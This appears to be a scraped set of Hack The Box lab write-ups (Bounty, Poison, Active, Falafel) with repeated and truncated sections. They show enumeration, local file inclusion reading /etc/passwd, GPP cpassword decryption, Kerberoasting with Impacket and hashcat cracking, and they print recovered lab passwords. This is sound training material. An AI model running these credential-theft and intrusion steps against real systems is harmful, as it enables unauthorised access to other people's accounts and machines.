Enumeration

As always, lets start with a full nmap scan

[bash]

Nmap scan report for 10.10.10.93
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
3389/tcp open ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

[/bash]

Nmap shows a http service at port 80 and some weird Microsoft service at 3389. Lets browse to see what we can find.

PICTURE MERLIN

A wizard… That’s weird. Maybe a Marlin exploit? Anyway, the source inspection didn’t show anything. Lets fire up gobuster to get some info on the site.

[bash]

gobuster -u 10.10.10.93 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 50

=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.93/
[+] Threads : 50
[+] Wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2018/11/16 20:29:20 Starting gobuster
=====================================================
/aspnet_client (Status: 301)
/uploadedfiles (Status: 301)
=====================================================
2018/11/16 20:29:22 Finished
=====================================================

[/bash]

Great box over at hackthebox.eu, which learned me a nifty new trick. Lets get started!

Enumeration

As always, we start with a full nmap scan:

So we have port 80 running a HTTP service and port 22 running SSH.

Browsing to webpage displays the following:

We can run the following commands: Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

info.php reveals the following:

The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:

That sounds like an interesting file. First lets see what happens when we change the parameter after the file= part:

So our user is probably charix.

Lets see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt

Looking at the way the key was constructed, it looks like a base64 encoded key. The hint points us to that it is probably encoded 13 times. I’ve used the Cyberchef from GCHQ to decrypt the thing. It gives us the following key

The only service we’ve seen so far is the SSH service.

Exploitation

ssh 10.10.10.84 -l charix

Password: Charix!2#4%6&8(0

And we’re logged in.

Privilege Escalation

After running LinEnum, I noticed that a VNC service is running as root. To further explore this. Running LinEnum, I see that root is running VNC on 5901 and 5801, as well as sshd (which I already used to get access to the box). So, I probably need to setup a SSH tunnel to this machine and use VNC viewer to get access to the VNC-sessions on the Poisoin host.

I do the following:

I used  http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html  and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.

There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:

Using vncviewer, we can get access to the desktop of the root user, which contains the key:

Great box over at hackthebox.eu, which learned me a nifty new trick. Lets get started!

Enumeration

As always, we start with a full nmap scan:

[bash]

[/bash]

So we have port 80 running a HTTP service and port 22 running SSH.

Browsing to webpage displays the following:

We can run the following commands: Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

info.php reveals the following:

[bash]

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

[/bash]

The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:

[bash]

Array ( [0] =. [1]; .. [2]; browse.php [3]; index.php; info.php; ini.php; listfiles.php; phpinfo.php; pwdbackup.txt )

[/bash]

That sounds like an interesting file. First lets see what happens when we change the parameter after the file= part:

[bash]

http://10.10.10.84/browse.php?file=/etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr

$ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root:

daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and

Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin

kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games

pseudo-user:/:/usr/sbin/nologin news:*:8:8:News

Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man

Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell

Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission

User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail

Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind

Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS

Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-

user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep

user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp

programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-

user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post

Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd

unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web

Owner:/nonexistent:/usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged

user:/var/empty:/usr/sbin/nologin hast:*:845:845:HAST unprivileged

user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged

user:/nonexistent:/usr/sbin/nologin _tss:*:601:601:TrouSerS

user:/var/empty:/usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon

User:/nonexistent:/usr/sbin/nologin avahi:*:558:558:Avahi Daemon

User:/nonexistent:/usr/sbin/nologin cups:*:193:193:Cups

Owner:/nonexistent:/usr/sbin/nologin

charix:*:1001:1001:charix:/home/charix:/bin/csh

[/bash]

So our user is probably charix.

Lets see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt

[bash]

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

[/bash]

Looking at the way the key was constructed, it looks like a base64 encoded key. The hint points us to that it is probably encoded 13 times. I’ve used the Cyberchef from GCHQ to decrypt the thing. It gives us the following key

[bash]

Charix!2#4%6&8(0

[/bash]

The only service we’ve seen so far is the SSH service.
Exploitation

ssh 10.10.10.84 -l charix

Password: Charix!2#4%6&8(0

And we’re logged in.
Privilege Escalation

After running LinEnum, I noticed that a VNC service is running as root. To further explore this. Running LinEnum, I see that root is running VNC on 5901 and 5801, as well as sshd (which I already used to get access to the box). So, I probably need to setup a SSH tunnel to this machine and use VNC viewer to get access to the VNC-sessions on the Poisoin host.

I do the following:

[bash]

charix@Poison:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 713 3 tcp6 *:80 *:*
www httpd 713 4 tcp4 *:80 *:*
www httpd 712 3 tcp6 *:80 *:*
www httpd 712 4 tcp4 *:80 *:*
www httpd 711 3 tcp6 *:80 *:*
www httpd 711 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
www httpd 641 3 tcp6 *:80 *:*
www httpd 641 4 tcp4 *:80 *:*
www httpd 640 3 tcp6 *:80 *:*
www httpd 640 4 tcp4 *:80 *:*
www httpd 639 3 tcp6 *:80 *:*
www httpd 639 4 tcp4 *:80 *:*
www httpd 638 3 tcp6 *:80 *:*
www httpd 638 4 tcp4 *:80 *:*
www httpd 637 3 tcp6 *:80 *:*
www httpd 637 4 tcp4 *:80 *:*
root httpd 625 3 tcp6 *:80 *:*
root httpd 625 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe

[/bash]

I used http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.

There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:

[bash]

ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84

[/bash]

Using vncviewer, we can get access to the desktop of the root user, which contains the key:

[bash]

vncviewer -passwd secret
Use localhost:5901 to get access.
[/bash]

One of the first boxes that I did that actually requires me to attack Active Directory components (hence the name). Really learned a lot of new techniques. Lets jump in!

Enumeration

As always, we start with our default nmap scan:

[bash]

nmap -sC -sV -p- -oA initial 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49172/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-08-02 18:13:42
|_ start_date: 2018-08-02 09:21:01

[/bash]

Wow, thats a lot of services running. Lets see, what do we have:

• DNS on port 53
• LDAP on port 389/3268 (servicing the active.htb domain)
• Something on port 445 (I suspect SMB)
• Some HTTP services on port 593/47001
• Lots of Remote Procedure Calls

I first focused on the HTTP services, using nikto and gobuster. This did not give me any (usable) results. So I decided to look into port 445, hoping for SMB. I fired up the SMB scanner from Metasploit, to see what we could get:

[bash]

msf auxiliary(scanner/smb/smb2) > info

Name: SMB 2.0 Protocol Detection
Module: auxiliary/scanner/smb/smb2
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
hdm <x@hdm.io>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads

Description:
Detect systems that support the SMB 2.0 protocol

msf auxiliary(scanner/smb/smb2) > set RHOSTS 10.10.10.100
RHOSTS => 10.10.10.100
msf auxiliary(scanner/smb/smb2) > run

[+] 10.10.10.100:445 – 10.10.10.100 supports SMB 2 [dialect 255.2] and has been online for 9 hours
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

Yep, its Samba alright. Version 2. So that rules out EternalBlue, like at the Blue machine I posted about before.

I tried enum4linux to get more info, but ended up with all kinds of error messages. I switched to nullinux, which did give me some interesting results

[bash]

python nullinux.py -all 10.10.10.100

Starting nullinux v5.3.0 | 08-03-2018 09:53

[*] Enumerating Shares for: 10.10.10.100
Shares Comments
——————————————-
\\10.10.10.100\ADMIN$ Remote Admin
\\10.10.10.100\C$ Default share
\\10.10.10.100\IPC$
\\10.10.10.100\NETLOGON Logon server share
\\10.10.10.100\Replication
\\10.10.10.100\SYSVOL Logon server share
\\10.10.10.100\Users

[*] Enumerating: \\10.10.10.100\Replication
. D 0 Sat Jul 21 10:37:44 2018
.. D 0 Sat Jul 21 10:37:44 2018
active.htb D 0 Sat Jul 21 10:37:44 2018

[*] Enumerating Domain Information for: 10.10.10.100
[-] Could not attain Domain SID

[*] Enumerating querydispinfo for: 10.10.10.100

[*] Enumerating enumdomusers for: 10.10.10.100

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
[-] RID Failed: Could not attain Domain SID

[*] Testing 10.10.10.100 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.100

[-] No valid users or groups detected

[/bash]

We have some shares! Awesome. I used Nautilus (the default filebrowser in Kali) to see if I can access these shares. It seems that I can anonymously access the users share. I find our user there: SVC_TGS. Browsing the the desktop gives us the userkey.

Exploitation

While browsing the shares, it seems that I can anonymously access the replication share as well. After browsing for some time, I find a file called groups.xml. While looking into this file, I notice something interesting:

[bash]

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

[/bash]

I’ve never seen this kind of file before, but am immediately interested in the cpassword entry. It seems that cpassword is the result of a bad implementation of password management by Microsoft, which was fixed with a patch way back. However, this patch only prevents you from creating new policies and does not remove the old ones. I found a great explanation on the topic here and here. ADsecurity.org is an amazing site on AD-security! It seems that there are multiple tools out there for decrypting this kind of password. I used ggp-decrypt and gppredecrypt.py, both give the same result.

[bash]

python Gpprefdecrypt.py edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

[/bash]

We have the password! Nice. But where to use it…

Privilege Escalation

Looking back at the initial nmap scan, I do see some Kerberos in there as well. This made me thing of Kerberoasting. Lets see what we can find on this. I fire up Metasploit again:

[bash]

msf auxiliary(gather/kerberos_enumusers) > info

Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Matt Byrne <attackdebris@gmail.com>

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
DOMAIN active.htb yes The Domain Eg: demo.local
RHOST 10.10.10.100 yes The target address
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt yes Files containing usernames, one per line

Description:
This module will enumerate valid Domain Users via Kerberos from an
unauthenticated perspective. It utilizes the different responses
returned by the service for valid and invalid users.

References:
CVE: Not available
https://nmap.org/nsedoc/scripts/krb5-enum-users.html

&nbsp;

msf auxiliary(gather/kerberos_enumusers) > run

[*] Validating options…
[*] Using domain: ACTIVE.HTB…
[*] 10.10.10.100:88 – Testing User: "root"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "root" does not exist
[*] 10.10.10.100:88 – Testing User: "admin"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "admin" does not exist
[*] 10.10.10.100:88 – Testing User: "test"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "test" does not exist
[*] 10.10.10.100:88 – Testing User: "guest"…
[*] 10.10.10.100:88 – KDC_ERR_CLIENT_REVOKED – Clients credentials have been revoked
[-] 10.10.10.100:88 – User: "guest" account disabled or locked out
[*] 10.10.10.100:88 – Testing User: "info"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "info" does not exist
[*] 10.10.10.100:88 – Testing User: "adm"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "adm" does not exist
[*] 10.10.10.100:88 – Testing User: "mysql"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "mysql" does not exist
[*] 10.10.10.100:88 – Testing User: "user"…
[*] 10.10.10.100:88 – KDC_ERR_C_PRINCIPAL_UNKNOWN – Client not found in Kerberos database
[*] 10.10.10.100:88 – User: "user" does not exist
[*] 10.10.10.100:88 – Testing User: "administrator"…
[*] 10.10.10.100:88 – KDC_ERR_PREAUTH_REQUIRED – Additional pre-authentication required
[+] 10.10.10.100:88 – User: "administrator" is present

[/bash]

So there is an Administrator account. I then realized that I could have used impacket all this time. Lets see if we can get some hashes for the administrator user. I use the password cracked from cpassword to authenticate to the domain:

[bash]

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev – Copyright 2002-2018 Core Security Technologies

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
——————– ————- ——————————————————– ——————- ——————-
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40 2018-07-30 17:17:40

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a5631b150c67e6c40a4eaae2e600139$e0e88d46194f9f78d2c664442ccefe04b76b6e813314d5f7d36b8ac4a873015b556ca98117725a91583

[/bash]

We have the hash.  Time to fire up hashcat.

[bash]

hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt –force
hashcat (v4.1.0) starting…

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Xeon E312xx (Sandy Bridge), 2048/5931 MB allocatable, 8MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes…..: 139921507
* Keyspace..: 14344385
* Runtime…: 5 secs

Session……….: hashcat
Status………..: Running
Hash.Type……..: Kerberos 5 TGS-REP etype 23
Hash.Target……: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4…0a76cb
Time.Started…..: Fri Aug 3 10:38:17 2018 (29 secs)
Time.Estimated…: Fri Aug 3 10:39:14 2018 (28 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#1…..: 254.1 kH/s (8.86ms) @ Accel:16 Loops:1 Thr:64 Vec:8
Recovered……..: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress………: 7225344/14344385 (50.37%)
Rejected………: 0/7225344 (0.00%)
Restore.Point….: 7225344/14344385 (50.37%)
Candidates.#1….: jackrayado -> jabo03
HWMon.Dev.#1…..: N/A

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7a5631b150c67e6c40a4eaae2e600139$e0e88d46194f9f78d2c664442ccefe04b76b6e813314d5f7d36b8ac4a873015b556ca98117725a9158311bbb842795da5f494bfeb7ac6a1e31dc0d6c921fa7b89fb69d12d2b7a438257417dd6d73cabe3753dde6a29e133d68339f2a93b848f01073c1fbf430d3d6ea708c417ec8eeac846f46c5f9cda1501460949dc369a190e9399d93aff674d4f3910367a71cf21313598d2d0c22b427b9c0e1b0a7af4731a11b74067432b03697b4f7d96ced9b38cd22ac94c96d730c2dfd65a57a57080ad6b3f9a136307c5462681b23d06b418a0dde475307f828f57f9b8930f5e85bdb42f0661243c453de2aaca0cbdb2f442794f3b675bfd8edd052d6fe41620784a633e1917033fb1a8de83b8ee139d63e878055998a774f86bae4c24eb20ea5f92ba8fac4c11e8e6bd2df75a1ad33735905b8ad3b256e85542b84f5b4ae6999005313440d48b79667bbc84945ac8600627b2aa5d8cfb4f19bd286886281f523a67d59c48d410b61c0be623987a03e8eedfa136c4dcf6eefe06a7d3aa19e12f26a23e315de89b3db75ecba5e4d733809bea11f31bc9de4453c400d096b13aea879494b4c1df19240fd416dd01beabf9a55fda0c5cc251bc5b679d7de14b2392d07eb4bfc27a4626c9f9351a92b2d55591827cee2fa0087ed21fb947ea78a0d178c3c408d098b4b2192b401cfcf3d7d1f4c91307d33b4a617f45677c82cba3f371b9d8e6729b5df17ab292d78b7c19c6bb7505000a33459b2d3bdcee9608caecee2fc965f98a15c6d7eba5071a59e7ced22f2b84117471e2d8a23bbe1a933aa0ab418f71f6b6f3e799bd0c96d3fa855c202d1a2795b6869b48aba75356b337655b07e3be228ca3cf22a25d1b6fd5f2bd5ef62c9a9f920228e8e5bd43b5c581316e4f4384599223283a288649cda963b408893c4fc700d2b377605abdbc4ad63c5138cef45f482cf04bce83b22055cde5982983556426379b47a9055d8d5722f4831d7d5295b5fb18f4b6356b4bfcf4392f6d0725c87067b5846611cad7d61eb5e4424cba6172291f39daca2fc85b960bb1194bb81dc4887ff6f40d4f0280c8e9329244685f81d57c5906ccd3f6d153176ee7541d35ff240f575a06694814a2f34d464f29308d113b625acdfb9f079f457c1366479437819c77c025d5c070ba6b9b4c7b964d6f5d4a50708557f5b919125fc675a0811fcaacc32f7aa7ac71f75b8b5476fbf44777d8a1e33cca17805a45cb90aa291ebf28062890a76cb:Ticketmaster1968

[/bash]

Game, set, match. We got the Administrator password: Ticketmaster1968. Use this password and the Administrator username to browse to the desktop of the Administrator user to get all root key.

In retrospective, I could have also use to following tools/methods:

1.  Run invoke-kerberoast.ps1 from Powershell Empire to get all the users to start using Bloodhound for reconnaisance.
2. Use Pass-The-Hash instead of bruteforcing (not neccessary actually, but could have been nice)

Writeup on the Falafel box that has been retire since yesterday. This is one of the harder boxes I’ve done so far. Lets get started!

Enumeration

As always, I start with my trusted nmap scan on all ports:

[bash]

nmap -sC -sV -p- -oA nmap-initialscan 10.10.10.73

Nmap scan report for 10.10.10.73
Host is up (0.096s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

[/bash]

We have a webserver running at port 80 and a SSH service at port 22. Lets fire up gobuster to explore the webserver. I switched to user both the common.txt wordlists from Seclist as well as the directory-list-2.3-medium.txt that is included with Kali.

[bash]

gobuster -u 10.10.10.73 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x .html,.txt,.pdf,.cgi,.php,.asp,.aspx

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.73/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 204,301,302,307,200
[+] Extensions : .html,.txt,.pdf,.cgi,.php,.asp,.aspx
=====================================================
/assets (Status: 301)
/css (Status: 301)
/footer.php (Status: 200)
/header.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/login.php (Status: 200)
/logout.php (Status: 302)
/profile.php (Status: 302)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/style.php (Status: 200)
/upload.php (Status: 302)
/uploads (Status: 301)

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.73/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,200
[+] Extensions : .html,.txt,.pdf,.cgi,.php,.asp,.aspx
=====================================================
/images (Status: 301)
/index.php (Status: 200)
/login.php (Status: 200)
/profile.php (Status: 302)
/uploads (Status: 301)
/header.php (Status: 200)
/assets (Status: 301)
/footer.php (Status: 200)
/upload.php (Status: 302)
/css (Status: 301)
/style.php (Status: 200)
/js (Status: 301)
/logout.php (Status: 302)
/robots.txt (Status: 200)
/cyberlaw.txt (Status: 200)
/connection.php (Status: 200)

[/bash]

Where common.txt showed most of the same stuff as the medium wordlist, I see some big differences with one standing out : http://10.10.10.73/cyberlaw.txt. Lets see whats in this txt file:

From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***

A user named “chris” has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.

Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear develpors, fix this broken site ASAP.

~admin

Seems like my next target will be the upload function on the website. And I need to checkout the login bypass as well. Let’s conclude the enumeration by finding out the php-version that is running on the machine.

Exploitation

I first want to look at the login screen on http://10.10.10.73/login.php. I fire up sqlmap to see if it can force some SQL-injection. I use the wizard option for this (since I am lazy).

While that is running, lets look at the image upload function.

Privilege escalation

Priv Esc

https://hkh4cks.com/blog/2018/06/24/htb-falafel-walkthrough/

https://infosecuritygeek.com/hackthebox-falafel/

Ippsec:

Box just got retired. For the points it gets on HTB.eu, I found it quite challenging…

Enumeration

As always, nmap to get going:

[bash]

sudo nmap -sC -sV -oA inital -p- 10.10.10.87
Starting Nmap 7.70 ( &amp;amp;amp;lt;a href="https://nmap.org" data-mce-href="https://nmap.org"&amp;amp;amp;gt;https://nmap.org&amp;amp;amp;lt;/a&amp;amp;amp;gt; ) at 2018-08-10 08:50 UTC
Nmap scan report for 10.10.10.87
Host is up (0.068s latency).
